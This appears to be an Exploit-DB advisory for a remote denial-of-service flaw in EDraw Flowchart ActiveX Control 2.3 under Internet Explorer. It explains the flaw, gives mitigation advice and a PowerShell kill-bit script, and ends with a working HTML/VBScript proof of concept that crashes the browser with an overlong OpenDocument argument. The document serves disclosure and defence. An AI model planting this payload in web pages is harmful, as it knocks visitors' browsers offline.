Vendor: EdrawSoft
Product Name: EDraw Flowchart ActiveX Control
Author: Gjoko 'LiquidWorm' Krstic
CVSS: 7.5 (HIGH)
Type: Remote Denial of Service (DoS)
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: NO
Related CWE:
CPE: a:edrawsoft:edraw_flowchart_activex_control:2.3
Metasploit:
Other Scripts:
Platforms Tested: MS Win XP Pro SP3 (en) / IE 8.0
Year: 2010

EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)

The EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx, CLSID {F685AFD8-A5CC-410E-98E4-BAA1C559BA61}) is registered as safe for scripting and safe for initialization, so any web page rendered by Internet Explorer can instantiate it and call its methods. Passing an overlong string (the proof of concept below uses 4444 'J' characters) as the filename argument of the OpenDocument method crashes the control, and with it the hosting Internet Explorer process. The result is a remote denial of service triggered simply by visiting a web page; no user interaction beyond loading the page is required.

Mitigation:

No vendor patch is available for version 2.3. Because the control is marked safe for scripting and safe for initialization through registry keys (it does not implement IObjectSafety), the effective mitigation is to stop Internet Explorer from instantiating it: set the kill bit for CLSID {F685AFD8-A5CC-410E-98E4-BAA1C559BA61} (a Compatibility Flags DWORD of 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}), remove the Safe for Scripting / Safe for Initialization component categories from the control's CLSID key, or unregister EDImage.ocx entirely if it is not needed. Avoiding untrusted websites and keeping the operating system and browser patched reduce exposure but do not remove the flaw.
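The following PowerShell script is an added example, not part of the original advisory or of EdrawSoft's software. It reports whether the control is registered with the Safe for Scripting / Safe for Initialization categories, then sets the Internet Explorer kill bit for the CLSID taken from the advisory. The registry paths, category GUIDs and the 0x400 flag value are the documented IE/COM ones; the function names are this example's own, and the script assumes it is run from an elevated prompt.

```powershell
# Added example (not from the original advisory): inspect how EDImage.ocx is
# exposed to IE scripting and set the kill bit for it.  Run elevated.
$Clsid = '{F685AFD8-A5CC-410E-98E4-BAA1C559BA61}'   # from the advisory

# COM component categories that make IE treat a control as "safe"
$SafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$SafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'

# Compatibility Flags bit that tells IE never to instantiate the CLSID
$KillBit = 0x400

function Get-ActiveXSafety {
    param([string]$Id)
    $base = "Registry::HKEY_CLASSES_ROOT\CLSID\$Id"
    if (-not (Test-Path $base)) { return $null }      # control not registered
    $cats = "$base\Implemented Categories"
    $server = (Get-ItemProperty "$base\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    New-Object PSObject -Property @{
        Clsid               = $Id
        Server              = $server
        SafeForScripting    = Test-Path "$cats\$SafeForScripting"
        SafeForInitializing = Test-Path "$cats\$SafeForInitializing"
    }
}

function Get-KillBitHives {
    # Native hive always; the Wow6432Node hive covers 32-bit IE on 64-bit Windows
    $hives = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
    $wow = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
    if (Test-Path $wow) { $hives += $wow }
    return $hives
}

function Set-ActiveXKillBit {
    param([string]$Id)
    foreach ($hive in Get-KillBitHives) {
        $key = Join-Path $hive $Id
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the kill bit into any flags already present rather than overwriting them
        $flags = [int](Get-ItemProperty $key -ErrorAction SilentlyContinue).'Compatibility Flags'
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ($flags -bor $KillBit) -Type DWord
    }
}

function Test-ActiveXKillBit {
    param([string]$Id)
    foreach ($hive in Get-KillBitHives) {
        $key = Join-Path $hive $Id
        $flags = [int](Get-ItemProperty $key -ErrorAction SilentlyContinue).'Compatibility Flags'
        if (($flags -band $KillBit) -eq 0) { return $false }
    }
    return $true
}

Get-ActiveXSafety $Clsid | Format-List
Set-ActiveXKillBit $Clsid
Write-Output ("Kill bit set for {0}: {1}" -f $Clsid, (Test-ActiveXKillBit $Clsid))
```

Setting the kill bit leaves the OCX registered for other COM hosts (the EDraw application itself keeps working); it only blocks instantiation from Internet Explorer, which is the attack surface this advisory concerns. Running Get-ActiveXSafety before the change should show both safety categories present, matching the "RegKey Safe for Script: True / Safe for Init: True" lines in the raw advisory.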

Exploit-DB raw data:

######################


 EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)


 Vendor: EdrawSoft - http://www.edrawsoft.com

 Platform Used: MS Win XP Pro SP3 (en) / IE 8.0


 CompanyName		EDrawSoft
 FileDescription	EDraw Flowchart ActiveX Control Module
 FileVersion		2, 3, 0, 6
 InternalName		EDrawSoft
 LegalCopyright		Copyright (C) 2005
 OriginalFileName	EDImage.OCX
 ProductName		EDraw Flowchart ActiveX Control Module
 ProductVersion		2, 3, 0, 6

 Report for Clsid: {F685AFD8-A5CC-410E-98E4-BAA1C559BA61}
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False


 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

 Zero Science Lab - http://www.zeroscience.mk

 liquidworm gmail com



 18.04.2010


 Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4936.php


######################


 <object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='thricer' />
 <script language='vbscript'>

 ' Reference data for the targeted control and method (informational,
 ' not used by the code below)
 targetFile = "C:\PROGRA~1\EDIMAG~1\EDImage.ocx"
 prototype  = "Function OpenDocument ( ByVal filename As String ) As Boolean"
 memberName = "OpenDocument"
 progid     = "EDIMAGELib.EDImage"
 argCount   = 1

 ' Overlong filename argument: 4444 x "J"
 arg1=String(4444, "J")

 ' Calling OpenDocument with the overlong string crashes the control
 ' and takes the hosting Internet Explorer process down with it
 thricer.OpenDocument arg1 

 </script>